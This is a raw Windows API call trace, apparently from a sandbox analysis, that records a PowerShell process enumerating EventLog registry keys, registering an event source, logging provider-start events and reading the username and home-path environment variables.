	[0290.988] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.988] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x354) returned 0x0
	[0290.988] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.988] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x358) returned 0x0
	[0290.988] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.988] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x35c) returned 0x0
	[0290.988] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.988] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x360) returned 0x0
	[0290.988] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.988] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x364) returned 0x0
	[0290.988] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.989] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x368) returned 0x0
	[0290.989] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.989] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x36c) returned 0x0
	[0290.989] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.989] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x370) returned 0x0
	[0290.989] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x374) returned 0x0
	[0290.989] RegCloseKey (hKey=0x374) returned 0x0
	[0290.989] RegCloseKey (hKey=0x34c) returned 0x0
	[0290.990] RegCloseKey (hKey=0x370) returned 0x0
	[0290.990] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d248 | out: phkResult=0x26d248*=0x370) returned 0x0
	[0290.990] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d1bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d1bc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d1b8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.990] CoTaskMemFree (pv=0x0) 
	[0290.990] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.990] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.991] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.991] CoTaskMemFree (pv=0x0) 
	[0290.991] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.991] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.991] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.991] CoTaskMemFree (pv=0x0) 
	[0290.991] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.991] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.991] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.991] CoTaskMemFree (pv=0x0) 
	[0290.991] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.991] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.991] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.991] CoTaskMemFree (pv=0x0) 
	[0290.991] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.991] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.991] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.991] CoTaskMemFree (pv=0x0) 
	[0290.991] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.991] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.991] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.991] CoTaskMemFree (pv=0x0) 
	[0290.991] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.991] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.992] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.992] CoTaskMemFree (pv=0x0) 
	[0290.992] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.992] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.992] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.992] CoTaskMemFree (pv=0x0) 
	[0290.992] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.992] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x4c3ad0, lpcchName=0x26d248, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d248, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.992] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.992] CoTaskMemFree (pv=0x0) 
	[0290.992] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x34c) returned 0x0
	[0290.992] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.992] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x374) returned 0x0
	[0290.992] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.992] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x378) returned 0x0
	[0290.992] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.992] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x37c) returned 0x0
	[0290.993] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.993] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x380) returned 0x0
	[0290.993] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.993] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x384) returned 0x0
	[0290.993] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.993] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x388) returned 0x0
	[0290.993] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.993] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x38c) returned 0x0
	[0290.993] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x0) returned 0x2
	[0290.993] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x390) returned 0x0
	[0290.994] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d2a8 | out: phkResult=0x26d2a8*=0x394) returned 0x0
	[0290.994] RegCloseKey (hKey=0x394) returned 0x0
	[0290.994] RegCloseKey (hKey=0x370) returned 0x0
	[0290.994] RegCloseKey (hKey=0x390) returned 0x0
	[0290.995] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d218 | out: phkResult=0x26d218*=0x390) returned 0x0
	[0290.995] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d18c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d188, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d18c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d188*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.995] CoTaskMemFree (pv=0x0) 
	[0290.995] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.995] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.995] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.995] CoTaskMemFree (pv=0x0) 
	[0290.995] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.995] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.995] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.995] CoTaskMemFree (pv=0x0) 
	[0290.995] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.996] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.996] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.996] CoTaskMemFree (pv=0x0) 
	[0290.996] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.996] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.996] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.996] CoTaskMemFree (pv=0x0) 
	[0290.996] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.996] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.996] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.996] CoTaskMemFree (pv=0x0) 
	[0290.996] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.996] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.996] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.996] CoTaskMemFree (pv=0x0) 
	[0290.996] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.996] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.996] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.996] CoTaskMemFree (pv=0x0) 
	[0290.996] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.996] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.996] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.996] CoTaskMemFree (pv=0x0) 
	[0290.996] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0290.997] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x4c3ad0, lpcchName=0x26d218, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d218, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0290.997] CoTaskMemFree (pv=0x4c3ad0) 
	[0290.997] CoTaskMemFree (pv=0x0) 
	[0290.997] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x370) returned 0x0
	[0290.997] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.997] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x394) returned 0x0
	[0290.997] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.997] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x398) returned 0x0
	[0290.997] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.997] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x39c) returned 0x0
	[0290.998] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.998] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x3a0) returned 0x0
	[0290.998] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.998] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x3a4) returned 0x0
	[0290.998] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.998] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x3a8) returned 0x0
	[0290.998] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.998] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x3ac) returned 0x0
	[0290.998] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x0) returned 0x2
	[0290.998] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x3b0) returned 0x0
	[0290.998] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d278 | out: phkResult=0x26d278*=0x3b4) returned 0x0
	[0290.999] RegCloseKey (hKey=0x3b4) returned 0x0
	[0290.999] RegCloseKey (hKey=0x390) returned 0x0
	[0290.999] RegCloseKey (hKey=0x3b0) returned 0x0
	[0291.004] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1bac0008
	[0291.020] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x339cc28*="WSMan", lpRawData=0x339c998) returned 1
	[0292.603] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.603] CoTaskMemFree (pv=0x517f40) 
	[0292.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.623] CoTaskMemAlloc (cb=0x804) returned 0x1b8adb30
	[0292.623] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8adb30, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0292.623] CoTaskMemFree (pv=0x1b8adb30) 
	[0292.623] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0292.623] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0292.624] CoTaskMemFree (pv=0x4c3ad0) 
	[0292.624] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e8c5a0*="Alias", lpRawData=0x2e8c330) returned 1
	[0292.657] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.657] CoTaskMemFree (pv=0x517f40) 
	[0292.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0292.659] CoTaskMemAlloc (cb=0x804) returned 0x1b8adb30
	[0292.660] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8adb30, nSize=0x26d508 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x26d508) returned 0x1
	[0292.660] CoTaskMemFree (pv=0x1b8adb30) 
	[0292.660] CoTaskMemAlloc (cb=0x204) returned 0x4c3ad0
	[0292.660] GetUserNameW (in: lpBuffer=0x4c3ad0, pcbBuffer=0x26d548 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x26d548) returned 1
	[0292.660] CoTaskMemFree (pv=0x4c3ad0) 
	[0292.661] ReportEventW (hEventLog=0x1bac0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e91b98*="Environment", lpRawData=0x2e91928) returned 1
	[0292.695] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0292.695] CoTaskMemFree (pv=0x517f40) 
	[0292.696] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.696] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0292.696] CoTaskMemFree (pv=0x517f40) 
	[0292.696] CoTaskMemAlloc (cb=0x104) returned 0x517f40
	[0292.696] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x517f40, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0292.696] CoTaskMemFree (pv=0x517f40) 
	[0292.697] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x26d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0292.697] SetErrorMode (uMode=0x1) returned 0x1
